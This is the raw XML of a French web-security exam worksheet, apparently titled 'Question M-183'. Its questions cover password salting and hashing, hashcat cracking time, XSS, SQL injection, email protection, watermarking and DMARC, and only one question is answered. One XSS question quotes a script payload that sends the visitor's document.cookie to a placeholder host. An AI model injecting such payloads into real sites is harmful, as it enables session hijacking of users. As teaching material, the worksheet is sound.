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7D9C" w14:textId="1466C7E2" w:rsidR="00702C4A" w:rsidRDefault="00702C4A" w:rsidP="00702C4A">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Question M-183</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460EEEA3" w14:textId="418160AA" w:rsidR="00702C4A" w:rsidRDefault="009E4720" w:rsidP="009E4720">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:r>
        <w:t>Authentification :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041AA4F8" w14:textId="167CCA6E" w:rsidR="000B25C8" w:rsidRPr="00680B8F" w:rsidRDefault="009E4720" w:rsidP="000B25C8">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A part une société de télécommunication, qu’est-ce que le ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>salt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ ajouté à un mot de passe et à quoi il sert ?</w:t>
      </w:r>
      <w:r w:rsidR="000B25C8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B25C8" w:rsidRPr="00D07B3A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Le sel est une chaîne de caractère aléatoire ajoutée à un mot de passe </w:t>
      </w:r>
      <w:r w:rsidR="00C95013" w:rsidRPr="00D07B3A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>pour les améliorer. Cela rend unique le mot de passe et plus sûr.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6EA1EC" w14:textId="77777777" w:rsidR="00680B8F" w:rsidRDefault="00680B8F" w:rsidP="00680B8F">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B03BBCE" w14:textId="16A9BC12" w:rsidR="0068482E" w:rsidRDefault="0068482E" w:rsidP="009E4720">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Donner 1 exemple de mot de passe :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A0AD5F" w14:textId="647742D9" w:rsidR="0068482E" w:rsidRDefault="0068482E" w:rsidP="0068482E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cracké instantanément -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4C7BE3" w14:textId="7BB95A32" w:rsidR="0068482E" w:rsidRDefault="0068482E" w:rsidP="0068482E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cracké en quelque minutes / heures -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C61EE9" w14:textId="5488591C" w:rsidR="0068482E" w:rsidRDefault="0068482E" w:rsidP="0068482E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cracké en plusieurs années -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCF5E2B" w14:textId="77777777" w:rsidR="00DA1B55" w:rsidRDefault="00DA1B55" w:rsidP="00DA1B55">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39096A93" w14:textId="675C46AD" w:rsidR="0068482E" w:rsidRDefault="007C42F6" w:rsidP="0068482E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un mot de passe peut être </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashé</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ou crypté. Quelle est la différence et comment peut-on dans les deux cas récupérer le mot de passe initial si cela est possible ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A103762" w14:textId="77777777" w:rsidR="00DA1B55" w:rsidRDefault="00DA1B55" w:rsidP="00DA1B55">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5412B13D" w14:textId="228F8DE7" w:rsidR="00B916D6" w:rsidRDefault="00B916D6" w:rsidP="0068482E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Démontrez mathématiquement qu’un mot de passe composé de majuscules, minuscules, chiffres ainsi que les caractères spéciaux # ;! Et d’une longueur de 12 symboles ne sera cassé qu’après plusieurs années avec une architecture multi-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gpu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (4x) et « </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ocl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-plus » pouvant tester 20'000 </w:t>
      </w:r>
      <w:r w:rsidR="00884468">
        <w:t>mots</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de passe à la seconde</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1322B3" w14:textId="5738DE57" w:rsidR="00F362EC" w:rsidRDefault="00F362EC" w:rsidP="00F362EC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:r>
        <w:t>Scripting :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB6943C" w14:textId="530F6493" w:rsidR="00F362EC" w:rsidRDefault="00F362EC" w:rsidP="00F362EC">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Que veut dire l’acronyme XSS (anglais/français) et qu’est-ce que cela implique pour un utilisateur qui se dirigerait sur un site avec une telle faille ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109232FF" w14:textId="77777777" w:rsidR="00720960" w:rsidRDefault="00720960" w:rsidP="00720960">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EBD1D32" w14:textId="60C5852B" w:rsidR="00720960" w:rsidRDefault="00F362EC" w:rsidP="00720960">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Comment peut-on se protéger d’une faille XSS en PHP (et pourquoi un header http « X-XSS-Protection : 1 » ne serait pas suffisant) ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B54FA4" w14:textId="77777777" w:rsidR="00720960" w:rsidRDefault="00720960" w:rsidP="00720960">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6EB134" w14:textId="67872DAF" w:rsidR="009B47C4" w:rsidRDefault="009B47C4" w:rsidP="00F362EC">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Est-ce qu’une faille XSS pourrait amener un hacker à obtenir un login / mot de passe (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashé</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ou pas) et si oui, comment ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F08D15" w14:textId="77777777" w:rsidR="00720960" w:rsidRDefault="00720960" w:rsidP="00720960">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64315384" w14:textId="6ACC4427" w:rsidR="003B39AD" w:rsidRDefault="003B39AD" w:rsidP="00F362EC">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Qu’est-ce qui se passe si je soumets ce contenu dans un site non protégé contre les failles XSS et qu’un utilisateur accède à la page qui présente ce contenu ?</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">&lt;script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>language</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etmlscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;console.log(« </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>you</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have been </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hacked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by</w:t>
      </w:r>
      <w:r w:rsidR="00874403">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Narut0 ») ;</w:t>
      </w:r>
      <w:r w:rsidR="00874403">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>window.localtion.href=« https://spoof.cookie.com?data=</w:t>
      </w:r>
      <w:r w:rsidR="00874403">
        <w:t> »+document.cookie ;&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395F6F60" w14:textId="481218AB" w:rsidR="00C16A51" w:rsidRDefault="00C16A51" w:rsidP="00C16A51">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:r>
        <w:t>Injection SQL :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79493481" w14:textId="726137CA" w:rsidR="00C16A51" w:rsidRDefault="00C16A51" w:rsidP="00C16A51">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Est-ce qu’un site utilisant </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mongodb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est sensible à une injection SQL ou similaire et si oui, pourquoi ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A6466F" w14:textId="77777777" w:rsidR="00720960" w:rsidRDefault="00720960" w:rsidP="00720960">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D0A883C" w14:textId="0EE4BE92" w:rsidR="00720960" w:rsidRDefault="009C3050" w:rsidP="00720960">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Avec quel contenu (texte) pouvez-vous tester un site sur sa vulnérabilité en injection SQL simple ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136D23FE" w14:textId="77777777" w:rsidR="00720960" w:rsidRDefault="00720960" w:rsidP="00720960">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6A6D0B" w14:textId="3E6EEA3B" w:rsidR="00720960" w:rsidRDefault="00F63D7A" w:rsidP="00720960">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Peut-on modifier le contenu d’une base de données avec une injection SQL et si oui, avec quel contenu envoyé au serveur ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001E031F" w14:textId="77777777" w:rsidR="00720960" w:rsidRDefault="00720960" w:rsidP="00720960">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C94611" w14:textId="3DD079ED" w:rsidR="00FD02C3" w:rsidRDefault="00FD02C3" w:rsidP="00C16A51">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Comment faut-il configurer un site en PHP et/ou son serveur MySQL afin qu’une erreur de syntaxe SQL ne soit pas reportée clairement à un hacker ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E24EE5" w14:textId="608F0686" w:rsidR="003309C3" w:rsidRDefault="003309C3" w:rsidP="003309C3">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:r>
        <w:t>Protection des informations :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FA3159" w14:textId="264CA510" w:rsidR="003309C3" w:rsidRDefault="003309C3" w:rsidP="003309C3">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Citez 3 manières de protéger une adresse mail affichée sur un site internet en expliquant leur force et faiblesse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65650D0F" w14:textId="77777777" w:rsidR="00720960" w:rsidRDefault="00720960" w:rsidP="00720960">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E35D6B3" w14:textId="377FA235" w:rsidR="00720960" w:rsidRDefault="006F1419" w:rsidP="00720960">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Comment peut-on cacher un copyright dans une image afin d’être certain de savoir si quelqu’un l’a copiée sans autorisation</w:t>
      </w:r>
      <w:r w:rsidR="009002B6">
        <w:t> ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2590EF" w14:textId="77777777" w:rsidR="00720960" w:rsidRDefault="00720960" w:rsidP="00720960">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="218137C3" w14:textId="2C09A467" w:rsidR="00720960" w:rsidRDefault="00934114" w:rsidP="00720960">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Quelle est la limitation d’un web crawler qui n’interprète pas le javascript dans le cadre de la constitution d’une base de données d’adresses email ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2A36B2" w14:textId="77777777" w:rsidR="00720960" w:rsidRDefault="00720960" w:rsidP="00720960">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AE37E9A" w14:textId="19AB935A" w:rsidR="00720960" w:rsidRDefault="003D66EE" w:rsidP="00720960">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Qui a intérêt à payer un service pour ajouter une signature numérique dans une image électronique ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3177C594" w14:textId="77777777" w:rsidR="00720960" w:rsidRDefault="00720960" w:rsidP="00720960">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BC6E183" w14:textId="2ABA8A3F" w:rsidR="00510312" w:rsidRPr="003309C3" w:rsidRDefault="00510312" w:rsidP="003309C3">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Qu’est-ce que DMARC, qu’adresse-t-il comme problématique et comment cela fonctionne-t-il ?</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00510312" w:rsidRPr="0033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33D93"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5EEA89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4C38"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="85C68B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B320D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F34A8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7521F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E41CA4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A"/>
    <w:rsid w:val="000B25C8"/>
    <w:rsid w:val="002A5B24"/>
    <w:rsid w:val="003309C3"/>
    <w:rsid w:val="003B39AD"/>
    <w:rsid w:val="003D66EE"/>
    <w:rsid w:val="00510312"/>
    <w:rsid w:val="00680B8F"/>
    <w:rsid w:val="0068482E"/>
    <w:rsid w:val="006F1419"/>
    <w:rsid w:val="00702C4A"/>
    <w:rsid w:val="00720960"/>
    <w:rsid w:val="007C42F6"/>
    <w:rsid w:val="00874403"/>
    <w:rsid w:val="00884468"/>
    <w:rsid w:val="009002B6"/>
    <w:rsid w:val="00934114"/>
    <w:rsid w:val="009B47C4"/>
    <w:rsid w:val="009C3050"/>
    <w:rsid w:val="009E4720"/>
    <w:rsid w:val="00B916D6"/>
    <w:rsid w:val="00C16A51"/>
    <w:rsid w:val="00C95013"/>
    <w:rsid w:val="00D07B3A"/>
    <w:rsid w:val="00DA1B55"/>
    <w:rsid w:val="00F362EC"/>
    <w:rsid w:val="00F63D7A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3841"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{121DF075-9A69-40B9-9E4E-35A3DDF8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E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E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27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-12T05:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-12T05:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>